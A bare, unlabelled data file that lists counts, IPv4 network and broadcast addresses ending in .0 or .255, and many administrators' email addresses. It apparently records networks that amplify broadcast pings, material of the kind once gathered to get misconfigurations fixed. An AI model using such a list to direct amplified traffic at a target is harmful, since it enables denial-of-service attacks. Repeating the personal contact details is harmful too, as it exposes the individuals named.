27 209.167.127.255 rmaclell@cancom.ca
27 208.151.220.255 ipswip@cw.net
27 207.91.25.0 jdelong@alphalincoln.com
27 208.167.58.255
27 208.2.81.255 jstabler@emi.net
27 209.227.75.0 eric@mxol.com
27 207.108.165.0 dns-info@uswest.net
27 208.221.186.255 nomailbox@nowhere
27 208.168.82.255 johnf@banet.net
27 208.192.151.255 registrar@netrax.net
27 206.68.107.0 maajid@aix.cps.edu
27 207.108.171.0 dns-info@uswest.net
27 206.68.107.255 maajid@aix.cps.edu
27 207.108.171.255 dns-info@uswest.net
27 216.51.58.0 technical@kivex.com
26 63.65.8.0 twright@cathedral.org
26 192.106.229.0 arnklit@mclink.it
26 193.45.251.0 Bertil.Hanses@trema.com
26 193.50.189.255 blanc@enit.fr
26 194.74.202.0 robinb@cityscape.co.uk
26 194.74.202.255 robinb@cityscape.co.uk
26 194.93.134.0 mcarr@intensive.net, j.baker@intensive.net
26 194.93.144.0 mcarr@intensive.net, j.baker@intensive.net
26 195.162.160.0 posa@univ-lyon1.fr
26 195.202.143.255 herbert.voegl@kabsi.at, chris@streams.at,
christian.steger@indis.at
26 195.74.150.0 rday@blacksunplc.com, hostmaster@red.net
26 198.175.30.0 labbem@homes.com
26 198.175.30.255 labbem@homes.com
26 198.188.164.0 nes@4c.net
26 198.243.153.255 dtorbet@jonesinternet.com
26 198.64.44.255 hostmaster@sesqui.net
26 198.85.16.0 johnmi@walkerassoc.com
26 198.85.16.255 johnmi@walkerassoc.com
26 198.87.56.0 noc@bizserve.com
26 199.178.75.0 hostmaster@ameritech.net
26 199.4.121.0 cward@atgi.net
26 199.4.121.255 cward@atgi.net
26 199.98.105.0 hostinfo@psi.com
26 199.98.105.255 hostinfo@psi.com
26 199.98.106.0 hostinfo@psi.com
26 199.98.106.255 hostinfo@psi.com
26 200.129.170.255 gomide@nic.br
26 200.137.192.0 gomide@nic.br
26 200.16.177.255 nomailbox@nowhere
26 202.22.25.0 dns@netlink.co.nz
26 203.126.201.0 hostmaster@singnet.com.sg
26 203.127.92.255 cheong@singnet.com.sg, hostmaster@singnet.com.sg
26 203.96.16.255 craig@iprolink.co.nz, jshaw@actrix.gen.nz,
jims@optimation.co.nz
26 203.96.51.255 craig@iprolink.co.nz, jshaw@actrix.gen.nz,
jims@optimation.co.nz
26 204.142.228.0 caryl@rider.edu
26 204.142.228.255 caryl@rider.edu
26 204.158.26.0 D.Nash@utexas.edu
26 204.158.26.255 D.Nash@utexas.edu
26 204.210.83.255 rwintel@twmaine.com
26 204.243.42.0 hostinfo@psi.com
26 204.27.115.0 n@nectar.com
26 204.27.115.255 n@nectar.com
26 204.50.62.255 noc@sprint-canada.net
26 205.211.37.255 teha@algonquinc.on.ca
26 205.221.198.0 hikep@urbandale.k12.ia.us
26 205.228.252.0 robg@movielink.com
26 205.228.252.255 robg@movielink.com
26 206.132.219.0 snvnoc@globalcenter.net
26 206.156.173.0 markw@softech.co
26 206.156.173.255 markw@softech.co
26 207.86.188.0 dns@digex.net
26 207.104.36.0 chasw@windjammer.net
26 207.104.36.255 chasw@windjammer.net
26 207.141.28.255 akerlpw@lambgh.com
26 209.147.24.255 art@lacoe.edu
26 216.111.115.255 DLAURA@icsa.com
26 207.155.68.0 hostmaster@softaware.com
26 207.45.96.0 jfalk@itcmedia.com
26 207.196.81.255 hostmaster@clark.net
26 207.45.96.255 jfalk@itcmedia.com
26 206.221.202.0 domain-tech@hotwired.com
26 209.224.232.0 support@domainhost.com
26 207.22.96.255 hostmaster@clark.net
26 206.20.225.255 noc@corp.idt.net
26 209.224.235.255 support@domainhost.com
26 206.249.10.0 eric@mxol.com
26 208.157.56.0 alif@unibaseinc.com
26 216.115.160.0 alif@unibaseinc.com
26 207.159.193.0 chris@queens.lib.ny.us
26 208.157.59.255 alif@unibaseinc.com
26 216.115.160.255 alif@unibaseinc.com
26 207.159.193.255 chris@queens.lib.ny.us
26 207.17.211.0 dquiram@incc.net
26 207.203.218.0 ipadmin@bellsouth.net
26 208.139.68.255 bharvey@atmi.com
26 207.17.211.255 dquiram@incc.net
26 207.203.218.255 ipadmin@bellsouth.net
26 209.249.46.0 noc@above.net
26 207.109.43.255 dns-info@uswest.net
26 209.249.46.255 noc@above.net
26 209.63.86.255 kmiller@mhz.com
26 207.243.136.255 CWD@recoton.com
26 209.121.243.255 swip@istar.ca
26 209.124.64.0 cts@vec.net
26 209.124.71.255 cts@vec.net
26 209.82.81.0 NOCToronto@metronet.ca
26 209.82.88.255 NOCToronto@metronet.ca
26 209.63.86.0 kmiller@mhz.com
26 209.232.131.0 ip-admin@pbi.net
26 209.81.189.0 noc@megsinet.net
26 209.232.131.255 ip-admin@pbi.net
26 209.144.151.0 gary.wall@inet-systems.com
26 209.144.152.0 gary.wall@inet-systems.com
26 209.144.151.255 NOC@inet-systems.com
26 209.144.152.255 johnm@ikp.net
26 209.125.100.0 tsutomu@geocast.net
26 207.240.141.0 hostmaster@inch.com
26 209.173.69.0 bni@bnisolutions.com
26 209.226.83.0 noc@in.bell.ca
26 209.226.83.255 noc@in.bell.ca
26 216.123.8.0 sean@wenzel.net
26 208.154.220.0 jon@thoughtbubble.com
26 208.192.151.0 registrar@netrax.net
26 209.41.199.0 tstroup@fnsi.net
26 209.41.199.255 tstroup@fnsi.net
26 209.86.125.0 bac_net@mindspring.com
26 209.86.125.255 bac_net@mindspring.com
26 206.210.133.255 bpembert@amphi.com
25 129.113.180.0 burnett@panam1.panam.edu
25 129.113.180.255 burnett@panam1.panam.edu
25 134.241.97.255 hostmaster@umassp.edu
25 150.176.58.0 hostmaster@mail.firn.edu
25 192.204.156.0 JHEND@acnatsci.org
25 192.204.156.255 JHEND@acnatsci.org
25 192.204.19.0 JHEND@acnatsci.org
25 192.204.19.255 JHEND@acnatsci.org
25 192.244.1.0 yoshida@isse.oita-u.ac.jp
25 192.244.1.255 yoshida@isse.oita-u.ac.jp
25 192.250.24.0 diederik@eur.encompass.com
25 192.250.24.255 diederik@eur.encompass.com
25 193.44.99.0 orjan.l.swedberg@telia.se
25 193.44.99.255 orjan.l.swedberg@telia.se
25 193.5.54.0
25 193.5.54.255
25 193.50.189.0 blanc@enit.fr
25 194.235.135.255 csl01@mail.telepac.pt
25 194.70.212.255 postmaster@ngc.co.uk
25 194.77.100.0 de@lmnet.de
25 194.77.100.255 de@lmnet.de
25 195.134.68.0
25 195.182.177.0
25 195.224.200.0 rush@gxn.net, lol@xara.net
25 198.188.163.0 nes@4c.net
25 199.10.239.255 DSN1GCM@dsn10.med.navy.mil
25 199.108.250.0 dns@cerf.net
25 199.117.75.0 vicr@lobo.rmh.pr1.k12.co.us
25 199.117.75.255 vicr@lobo.rmh.pr1.k12.co.us
25 199.178.75.255 hostmaster@ameritech.net
25 199.2.208.255 NOC@sprint.net
25 199.72.96.0 hostmaster@interpath.net
25 199.72.96.255 hostmaster@interpath.net
25 200.34.164.0 jorge@ife.org.mx
25 200.34.164.255 jorge@ife.org.mx
25 200.34.165.0 jorge@ife.org.mx
25 200.34.165.255 jorge@ife.org.mx
25 200.34.166.0 jorge@ife.org.mx
25 200.34.166.255 jorge@ife.org.mx
25 202.104.150.0
25 202.104.150.255
25 202.104.151.0
25 202.104.151.255
25 202.214.252.0 hostmaster@nic.ad.jp
25 202.219.195.0 technical@apnic.net
25 202.24.143.255 hostmaster@nic.ad.jp
25 202.96.137.0
25 202.96.155.0
25 202.96.44.0
25 202.96.44.255
25 203.127.187.255 jeremy@sns.com.sg
25 203.172.11.255
25 203.96.16.0 craig@iprolink.co.nz, jshaw@actrix.gen.nz,
jims@optimation.co.nz
25 204.0.28.0 hostmaster@sesqui.net
25 204.0.28.255 hostmaster@sesqui.net
25 204.158.119.255 gjenere@tenet.edu
25 204.168.129.0 ny0149@mail.nyer.net
25 204.168.129.255 ny0149@mail.nyer.net
25 204.233.66.255 Thane_White@shscom.com
25 204.248.144.0 NOC@sprint.net
25 204.248.144.255 NOC@sprint.net
25 204.255.210.0 michael@cytation.com
25 204.255.210.255 michael@cytation.com
25 204.29.120.0 DNS@asc.edu
25 204.29.120.255 DNS@asc.edu
25 204.48.204.255 tuma@ceo.sbceo.k12.ca.us
25 204.49.212.0 dns@sprintans.net
25 204.49.212.255 dns@sprintans.net
25 204.73.51.0 mike@haven.com
25 204.73.51.255 mike@haven.com
25 204.84.6.0 hostmaster@ncren.net
25 205.165.53.0 RIDDLE@twu.edu
25 205.165.53.255 RIDDLE@twu.edu
25 205.171.33.255 hostmaster@csn.net
25 205.174.194.255 dharringt@deq.state.va.us
25 205.227.63.0 lgoodman@iacnet.com
25 205.230.187.0 bob@new-york.net
25 206.108.86.0 bhewlitt@interlog.com
25 206.13.99.0 gowen@keyinfo.com
25 206.132.166.0 ipadmin@globalcenter.net
25 206.132.166.255 ipadmin@globalcenter.net
25 206.132.219.255 snvnoc@globalcenter.net
25 206.154.10.0 hostmaster@netmcr.com
25 206.154.10.255 hostmaster@netmcr.com
25 206.158.44.255 Allen@afmiller.com
25 207.213.94.0 admin@zcs.net
25 210.145.27.0 hostmaster@nic.ad.jp
25 209.147.16.255 art@lacoe.edu
25 209.147.14.0 art@lacoe.edu
25 207.96.63.0 domreg@erols.com
25 207.1.177.0 dspeed@midusa.net
25 207.31.222.255 swip-admin@newengland.verio.net
25 216.111.115.0 DLAURA@icsa.com
25 207.49.107.255 ipadmin@cw.net
25 216.100.185.0 ip-admin@pbi.net
25 216.100.186.0 ip-admin@pbi.net
25 216.100.187.0 ip-admin@pbi.net
25 216.100.188.0 ip-admin@pbi.net
25 216.100.189.0 ip-admin@pbi.net
25 207.159.47.255 noc@ns.net
25 216.100.186.255 ip-admin@pbi.net
25 216.100.187.255 ip-admin@pbi.net
25 216.100.188.255 ip-admin@pbi.net
25 216.100.189.255 ip-admin@pbi.net
25 208.197.35.0
25 206.225.61.0 kenneth@jump.net
25 208.139.68.0 bharvey@atmi.com
25 209.102.84.0 dns-admin@ixa.net
25 206.246.140.0 robert@iquest.net
25 208.200.177.0 michael@cytation.com
25 208.197.35.255 michael@cytation.com
25 206.246.140.255 robert@iquest.net
25 208.200.177.255 michael@cytation.com
25 207.165.193.255 dave.klinkefus@icn.state.ia.us
25 207.228.38.0 dan@clp.com
25 207.175.108.0 ipadmin@gte.net
25 207.175.124.0 ipadmin@gte.net
25 207.175.125.0 ipadmin@gte.net
25 210.161.160.0 hostmaster@nic.ad.jp
25 210.63.176.0 maxkuan@ttn.com.tw, dean@ht.net.tw
25 208.152.233.0 doug@cookman.edu
25 212.58.35.255 ibreakey1@csi.com, hostmaster@red.net
25 207.228.38.255 dan@clp.com
25 207.175.108.255 ipadmin@gte.net
25 207.175.124.255 ipadmin@gte.net
25 207.175.125.255 ipadmin@gte.net
25 210.161.160.255 hostmaster@nic.ad.jp
25 210.63.176.255 maxkuan@ttn.com.tw, dean@ht.net.tw
25 208.152.233.255 doug@cookman.edu
25 209.60.125.0 internic@doitnow.com
25 207.243.136.0 CWD@recoton.com
25 207.98.156.0 hp@doitnow.com
25 209.223.174.0 treyco@internow.net
25 209.223.175.0 treyco@internow.net
25 209.144.193.0 boo@stilyagin.com
25 207.16.219.0 help@uunet.uu.net
25 210.169.71.255 hostmaster@nic.ad.jp
25 207.208.90.255 hostmaster@interaccess.com
25 209.60.125.255 internic@doitnow.com
25 207.98.156.255 hp@doitnow.com
25 207.98.159.255 hp@doitnow.com
25 209.223.174.255 treyco@internow.net
25 209.223.175.255 treyco@internow.net
25 209.144.193.255 boo@stilyagin.com
25 216.103.13.0 ip-admin@pbi.net
25 209.76.22.0 kenny@twnetwork.com
25 212.140.54.0 support@bt.net
25 212.140.55.0 support@bt.net
25 207.104.111.0 nomailbox@nowhere
25 207.164.163.0 debbie@bellglobal.com
25 216.100.214.0 sysadmin@access1.net
25 209.76.22.255 kenny@twnetwork.com
25 209.82.81.255 NOCToronto@metronet.ca
25 207.164.163.255 debbie@bellglobal.com
25 216.100.214.255 sysadmin@access1.net
25 206.99.44.0 egra@adinet.com.uy
25 216.84.57.0 support@elpn.com
25 208.158.122.0 karen@fmig.com
25 206.47.196.0
25 210.127.200.0 mgr@matrix.shinbiro.com, ip@matrix.shinbiro.com
25 207.66.209.0 pat@wolfe.net
25 206.47.216.0 noc@in.bell.ca
25 206.99.44.255 egra@adinet.com.uy
25 216.84.57.255 support@elpn.com
25 206.47.196.255 noc@in.bell.ca
25 206.47.216.255 noc@in.bell.ca
25 207.3.16.0 hostmaster@netmcr.com
25 207.3.17.0 hostmaster@netmcr.com
25 209.7.133.0 wdahlen@mail.isbe.state.il.us
25 207.3.16.255 hostmaster@netmcr.com
25 207.3.17.255 hostmaster@netmcr.com
25 209.7.133.255 wdahlen@mail.isbe.state.il.us
25 210.229.142.255 hostmaster@nic.ad.jp
25 208.150.1.0 hostmaster@netmcr.com
25 208.150.7.0 hostmaster@netmcr.com
25 208.150.10.0 hostmaster@netmcr.com
25 208.150.11.0 hostmaster@netmcr.com
25 208.150.12.0 hostmaster@netmcr.com
25 208.154.141.0 mosesm@usa.ibs.org
25 209.79.176.0 diamond@quick.net
25 208.150.1.255 hostmaster@netmcr.com
25 208.150.7.255 hostmaster@netmcr.com
25 208.150.10.255 hostmaster@netmcr.com
25 208.150.11.255 hostmaster@netmcr.com
25 208.150.12.255 hostmaster@netmcr.com
25 208.154.141.255 mosesm@usa.ibs.org
25 208.151.220.0 ipswip@cw.net
25 207.60.128.255 hostmaster@tiac.net
25 209.226.49.0 noc@in.bell.ca
25 209.226.51.0 noc@in.bell.ca
25 208.208.54.0 tom@metaverse.com
25 207.250.88.0 hostmaster@inc.net
25 209.226.49.255 noc@in.bell.ca
25 209.226.51.255 noc@in.bell.ca
25 208.208.54.255 tom@metaverse.com
25 206.187.60.255 Dave@dra.com
25 207.250.88.255 hostmaster@inc.net
25 209.190.102.255 hostmaster@thenap.net
25 210.127.194.255 mgr@matrix.shinbiro.com, ip@matrix.shinbiro.com
25 208.129.226.255 vince@markzware.com
25 208.168.208.0 julianc@peganet.net
25 209.249.219.0 noc@above.net
25 209.249.219.255 noc@above.net
25 207.60.165.255 hostmaster@tiac.net
25 208.2.81.0 jstabler@emi.net
25 208.154.220.255 jon@thoughtbubble.com
25 206.72.23.255 maut@pionet.net
25 210.145.26.255 hostmaster@nic.ad.jp
25 209.198.228.0 rvillalo@gbm.net
25 209.198.228.255
25 209.55.73.0 jimp@brandx.net
25 208.212.143.255 david.moyle@teligent.com
24 62.112.0.0 ripe-role@noc.online.be
24 62.160.105.0 hostmaster@oleane.net
24 62.160.105.255 hostmaster@oleane.net
24 134.241.38.0 hostmaster@umassp.edu
24 134.241.38.255 hostmaster@umassp.edu
24 150.176.58.255 hostmaster@mail.firn.edu
24 161.223.34.0
24 164.47.171.0 Mark.Montanez@pcc.cccoes.edu
24 164.47.171.255 Mark.Montanez@pcc.cccoes.edu
24 167.196.216.0 jda51@state.ga.us
24 167.196.217.255 jda51@state.ga.us
24 192.208.22.0 hays@wapa.gov
24 192.208.22.255 hays@wapa.gov
24 193.104.180.255
24 193.106.23.0 yp@jouve.fr
24 193.119.172.0
24 193.119.172.255
24 193.140.136.0 root@risc01.bim.gantep.edu.tr
24 193.140.136.255 root@risc01.bim.gantep.edu.tr
24 193.140.137.0 root@risc01.bim.gantep.edu.tr
24 193.140.137.255 root@risc01.bim.gantep.edu.tr
24 193.140.138.0 root@risc01.bim.gantep.edu.tr
24 193.140.138.255 root@risc01.bim.gantep.edu.tr
24 193.225.18.255 jules@apacs.pote.hu, dergo@apacs.pote.hu,
rugo@apacs.pote.hu
24 193.51.50.0
24 193.51.50.255
24 193.73.130.0 te@sda-ats.ch
24 194.159.126.255 postmaster@idg.co.uk
24 195.222.211.255
24 195.238.142.0 stein@swol.de, kniesel@dig.de
24 195.238.142.255 stein@swol.de, kniesel@dig.de
24 195.74.150.255 rday@blacksunplc.com, hostmaster@red.net
24 195.82.98.255 joel@mailbox.net.uk
24 198.174.19.0 spannaus@ties.k12.mn.us
24 198.174.19.255 spannaus@ties.k12.mn.us
24 199.10.239.0 DSN1GCM@dsn10.med.navy.mil
24 199.104.18.0 hathpaul@ba.isu.edu
24 199.104.18.255 hathpaul@ba.isu.edu
24 199.122.4.0 yano@fwva.saic.com
24 199.182.243.0 Louis_Lee@icgcomm.com
24 199.182.243.255 Louis_Lee@icgcomm.com
24 199.2.208.0 NOC@sprint.net
24 199.208.88.0
24 199.208.88.255
24 199.211.154.0 moffettm@dmcm.ssc.af.mil
24 200.129.170.0 gomide@nic.br
24 200.15.17.0 hostmaster@sesqui.net
24 200.18.41.0 gomide@nic.br
24 200.5.200.0 nomailbox@nowhere
24 200.5.200.255 nomailbox@nowhere
24 202.213.234.255 hostmaster@nic.ad.jp
24 202.213.32.0 hostmaster@nic.ad.jp
24 202.213.32.255 hostmaster@nic.ad.jp
24 202.234.4.0 hostmaster@nic.ad.jp
24 202.234.4.255 hostmaster@nic.ad.jp
24 202.238.85.0 hostmaster@nic.ad.jp
24 202.238.85.255 hostmaster@nic.ad.jp
24 202.24.143.0 hostmaster@nic.ad.jp
24 202.33.96.0 hostmaster@nic.ad.jp
24 202.39.224.0 admin@hinet.net, chlin@netnews.hinet.net
24 202.39.224.255 admin@hinet.net, chlin@netnews.hinet.net
24 202.39.225.0 admin@hinet.net, chlin@netnews.hinet.net
24 202.39.225.255 admin@hinet.net, chlin@netnews.hinet.net
24 202.51.128.0 hemantha@sri.lanka.net, channa@sri.lanka.net
24 202.82.245.255 noc@hkstar.com
24 203.108.225.0 net-ops@list.ozemail.com.au
24 203.242.136.255 mgr@ktnet.co.kr, ip@ktnet.co.kr
24 203.96.51.0 craig@iprolink.co.nz, jshaw@actrix.gen.nz,
jims@optimation.co.nz
24 204.176.205.255 lfo@brooktrout.com
24 204.180.36.255 NOC@sprint.net
24 204.210.82.0 rwintel@twmaine.com
24 204.210.82.255 rwintel@twmaine.com
24 204.210.83.0 rwintel@twmaine.com
24 204.84.6.255 hostmaster@ncren.net
24 205.154.165.0 nes@4c.net
24 205.160.84.255 NOC@sprint.net
24 205.213.150.255 nic@mail.wiscnet.net
24 205.221.190.0 rparis@ihcc.cc.ia.us
24 205.221.190.255 rparis@ihcc.cc.ia.us
24 205.221.198.255 hikep@urbandale.k12.ia.us
24 205.230.184.0 mpr@li.net
24 205.230.189.0 bob@new-york.net
24 205.237.226.255 nomailbox@nowhere
24 206.1.101.0 hostinfo@psi.com
24 206.101.238.0 nomailbox@nowhere
24 206.101.238.255 nomailbox@nowhere
24 206.104.102.0 netadmin@onramp.net
24 206.104.102.255 netadmin@onramp.net
24 206.108.86.255 bhewlitt@interlog.com
24 206.132.155.255 snvnoc@globalcenter.net
24 206.150.180.0 billw@mail.icongrp.com
24 206.150.180.255 billw@mail.icongrp.com
24 207.163.162.0 hostmaster@alameda-coe.k12.ca.us
24 208.167.146.0 lpowers@eastky.net
24 206.69.212.0 bamette@colum.edu
24 212.60.128.0 hostmaster@aconet.de, fschulte@hightek.com
24 207.137.159.0 noc@atmnet.net
24 212.60.128.255 hostmaster@aconet.de, fschulte@hightek.com
24 207.202.66.255 noc@corp.idt.net
24 207.202.66.0 noc@corp.idt.net
24 207.99.200.255 art@lacoe.edu
24 207.176.225.255 eddy@genet.org
24 210.169.71.0 hostmaster@nic.ad.jp
24 207.176.225.0 eddy@genet.org
24 210.224.249.255 hostmaster@nic.ad.jp
24 210.145.18.0 hostmaster@nic.ad.jp
24 208.12.176.0 nomailbox@nowhere
24 210.224.249.0 hostmaster@nic.ad.jp
24 210.145.18.255 hostmaster@nic.ad.jp
24 206.253.240.255 cql@cdimed.com
24 208.156.13.0 Paul.Burke@mci.com
24 216.145.152.0 troyraby@inwave.com
24 207.98.159.0 hp@doitnow.com
24 207.49.243.0 troyraby@inwave.com
24 207.49.244.0 troyraby@inwave.com
24 207.49.245.0 troyraby@inwave.com
24 207.49.246.0 troyraby@inwave.com
24 208.144.7.255 DIGICON@mindspring.com
24 208.156.13.255 Paul.Burke@mci.com
24 207.155.93.255 hostmaster@softaware.com
24 216.145.152.255 troyraby@inwave.com
24 209.122.173.255 domreg@erols.com
24 207.49.243.255 troyraby@inwave.com
24 207.49.244.255 troyraby@inwave.com
24 207.49.245.255 troyraby@inwave.com
24 207.49.246.255 troyraby@inwave.com
24 210.164.17.0 hostmaster@nic.ad.jp
24 207.104.102.0 support@access1.net
24 207.104.109.0 nomailbox@nowhere
24 210.227.123.0 hostmaster@nic.ad.jp
24 208.163.10.255 sullivan@ezwv.com
24 210.164.17.255 hostmaster@nic.ad.jp
24 207.104.102.255 support@access1.net
24 210.227.123.255 hostmaster@nic.ad.jp
24 208.154.170.255 ipadmin@cw.net
24 208.205.235.255 amurarka@splyglass.com
24 207.152.24.0 hostmaster@telalink.net
24 208.205.235.0 amurarka@splyglass.com
24 207.152.24.255 hostmaster@telalink.net
24 212.140.54.255 support@bt.net
24 207.1.208.255 lbemerer@lmccinti.com
24 209.77.127.0 rick@foothill.net
24 208.147.191.0 cdc@groupz.net
24 209.183.196.0 noc@atlantech.net
24 209.43.37.255 robert@iquest.net
24 208.147.191.255 cdc@groupz.net
24 209.102.103.255 robertc@savvis.com
24 208.131.107.255 nomailbox@nowhere
24 206.211.86.0 renae.h.key@gte.sprint.com
24 208.197.157.0
24 208.197.157.255 sales@texnet.net
24 208.3.238.0 parker@nandover.mec.edu
24 209.47.3.255 Andrew_Schachter@tbwacanada.com
24 206.52.82.0 bdot@toto.net
24 208.210.210.0 laberged@aascu.nche.edu
24 209.164.131.0 Bill_Stritzinger@dataplace.net
24 209.164.131.255 Bill_Stritzinger@dataplace.net
24 209.186.58.0 dns@cerf.net
24 209.79.64.0 nomailbox@nowhere
24 209.79.64.255 nomailbox@nowhere
24 210.68.152.0
24 206.52.82.255 bdot@toto.net
23 24.5.113.0 noc@noc.home.net
23 24.6.61.0 noc@noc.home.net
23 62.20.175.255 ip@telia.net, registry@telia.net, dns@telia.net
23 143.213.130.0 MILLARDD@shafter-emh3.army.mil
23 160.217.1.255 Lhotka@jcu.cz, norit.jo@mtvne.com
23 192.204.250.0 trouble@prep.net
23 192.204.250.255 trouble@prep.net
23 192.220.3.255 jvalluzz@pcc.edu
23 193.44.96.0 orjan.l.swedberg@telia.se
23 193.44.96.255 orjan.l.swedberg@telia.se
23 193.44.97.255 orjan.l.swedberg@telia.se
23 193.73.218.0 kobi@swiss.nexus-ag.com
23 194.159.126.0 postmaster@idg.co.uk
23 194.77.138.0 info@webmad.de, hostmaster@dpn.de
23 194.89.12.0
23 194.89.12.255
23 194.89.13.255
23 194.89.14.255
23 195.182.181.0
23 195.182.188.0
23 195.182.189.0 y.cheung@dccl.net, c.heald@dccl.net
23 195.220.107.0
23 195.224.218.0 rush@gxn.net, lol@xara.net
23 195.89.4.0 webmaster@the.site.ch
23 195.89.4.255 webmaster@the.site.ch
23 195.89.6.0 webmaster@the.site.ch
23 195.89.6.255 webmaster@the.site.ch
23 195.99.148.0
23 195.99.148.255
23 198.168.5.0 registrar@interlink.net
23 198.168.5.255 registrar@interlink.net
23 198.188.172.0 nes@4c.net
23 198.59.243.0
23 198.64.33.0 hostmaster@sesqui.net
23 198.64.33.255 hostmaster@sesqui.net
23 199.10.138.0 RLINDNER@force.cnsl.spear.navy.mil
23 199.10.138.255 RLINDNER@force.cnsl.spear.navy.mil
23 199.111.88.0 jaj@virginia.edu
23 199.111.88.255 jaj@virginia.edu
23 199.122.4.255 yano@fwva.saic.com
23 199.176.66.255 michael_jones@chi.leoburnett.com
23 199.211.192.0 ron_black_at_navtrans@fmso.navy.mil
23 199.211.192.255 ron_black_at_navtrans@fmso.navy.mil
23 199.252.20.0
23 199.252.20.255
23 199.252.23.0
23 199.35.107.255 rick@merc-int.com
23 199.76.61.0 philt@amelia.bham.lib.al.us
23 200.38.68.0 proeza@mpsnet.com.mx
23 200.38.68.255 proeza@mpsnet.com.mx
23 202.212.202.0 hostmaster@nic.ad.jp
23 202.212.202.255 hostmaster@nic.ad.jp
23 202.213.234.0 hostmaster@nic.ad.jp
23 202.218.13.255 technical@apnic.net
23 203.2.75.255 mark@cristal.syd.pronet.com
23 203.21.29.0 hostmaster@telstra.net
23 203.242.136.0 mgr@ktnet.co.kr, ip@ktnet.co.kr
23 203.29.91.0 hostmaster@telstra.net
23 203.38.28.0 hostmaster@telstra.net
23 204.111.64.0 wpirtle@globalcom.net
23 204.111.64.255 wpirtle@globalcom.net
23 204.116.96.0 mckee@admin.infoave.net
23 204.151.38.0 bterry@burnettgroup.com
23 204.174.235.255 jbailey@aurora.net
23 204.176.205.0 lfo@brooktrout.com
23 204.179.121.0 help@uunet.uu.net
23 204.179.121.255 help@uunet.uu.net
23 204.203.9.255 its@nw.verio.net
23 204.213.230.0 paolucci@riddler.com
23 204.213.230.255 paolucci@riddler.com
23 204.48.149.255 tuma@ceo.sbceo.k12.ca.us
23 204.49.196.0 dns@sprintans.net
23 204.57.105.0 mjudge@atsi.net
23 204.97.104.0
23 204.97.104.255
23 204.97.21.0 stewartw@fpc.edu
23 205.138.176.0 brian@dstream.net
23 205.138.176.255 brian@dstream.net
23 205.139.15.255 brendan@genghis.com
23 205.178.84.0 dave@brainstorm.net
23 205.200.16.0 mtsdns@mts.net
23 205.200.16.255 mtsdns@mts.net
23 205.231.229.0 Daniel.Malcor@internetaddress.com
23 205.231.229.255 Daniel.Malcor@internetaddress.com
23 205.243.90.0 nomailbox@nowhere
23 205.243.90.255 nomailbox@nowhere
23 206.0.193.0 hostinfo@psi.com
23 206.13.40.0 jonathan@sonic.net
23 206.132.208.255 ipadmin@globalcenter.net
23 206.151.238.255 baltar@sy.com
23 206.171.16.0 jason@symbio.net
23 209.63.149.0 cbrown@advanced-power.com
23 207.163.162.255 hostmaster@alameda-coe.k12.ca.us
23 209.147.15.0 art@lacoe.edu
23 209.48.15.0 dns@digex.net
23 207.238.117.0 dns@digex.net
23 208.156.205.0 nomailbox@nowhere
23 212.55.208.0 admin@cyberlink.ch
23 207.238.117.255 dns@digex.net
23 208.156.205.255 nomailbox@nowhere
23 212.55.207.255 admin@cyberlink.ch
23 207.201.65.0 support@celestar.com
23 207.201.74.0 peter@vsnet.com
23 207.201.75.0 alif@unibaseinc.com
23 207.201.78.0 matthew@mcr.net
23 207.201.124.0 support@celestar.com
23 210.228.160.0 hostmaster@nic.ad.jp
23 208.236.172.0 ward@intercom.net
23 208.236.173.0 ward@intercom.net
23 208.236.174.0 ward@intercom.net
23 212.55.207.0 admin@cyberlink.ch
23 207.201.65.255 support@celestar.com
23 207.201.74.255 peter@vsnet.com
23 207.201.75.255 alif@unibaseinc.com
23 207.201.124.255 support@celestar.com
23 208.236.172.255 ward@intercom.net
23 208.236.173.255 ward@intercom.net
23 208.156.204.255 nomailbox@nowhere
23 208.144.7.0 DIGICON@mindspring.com
23 207.104.20.0 jason@symbio.net
23 206.37.32.0 norberg@medsva.brooks.af.mil
23 209.180.96.0 paul@uswest.net
23 206.253.240.0 cql@cdimed.com
23 207.104.20.255 jason@symbio.net
23 208.204.158.255 brett@winkcomm.com
23 212.146.0.0 jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
ripe.registry@raketti.net,
ripe.sales@raketti.net, petri.siltakoski@kpy.fi
23 212.250.1.0 nmc@ntli.net, pulak.rakshit@ntli.net
23 212.250.2.0 nmc@ntli.net, bob.procter@ntli.net
23 212.58.5.0 cengiz@doruk.net.tr, gokhan@doruk.net.tr
23 212.58.24.0 ctarhan@pcworld.com.tr, cengiz@doruk.net.tr
23 212.146.32.0 jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
ripe.registry@raketti.net,
ripe.sales@raketti.net, petri.siltakoski@kpy.fi
23 216.205.48.0 neteng@sagenetworks.com
23 216.205.49.0 neteng@sagenetworks.com
23 209.235.69.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.70.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.71.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.72.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.73.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.74.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.75.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.76.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.77.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.78.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.79.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.80.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 207.104.103.0 support@access1.net
23 209.235.112.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.113.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.114.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.115.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.116.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.117.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.118.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.119.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.120.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.121.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.122.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.123.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
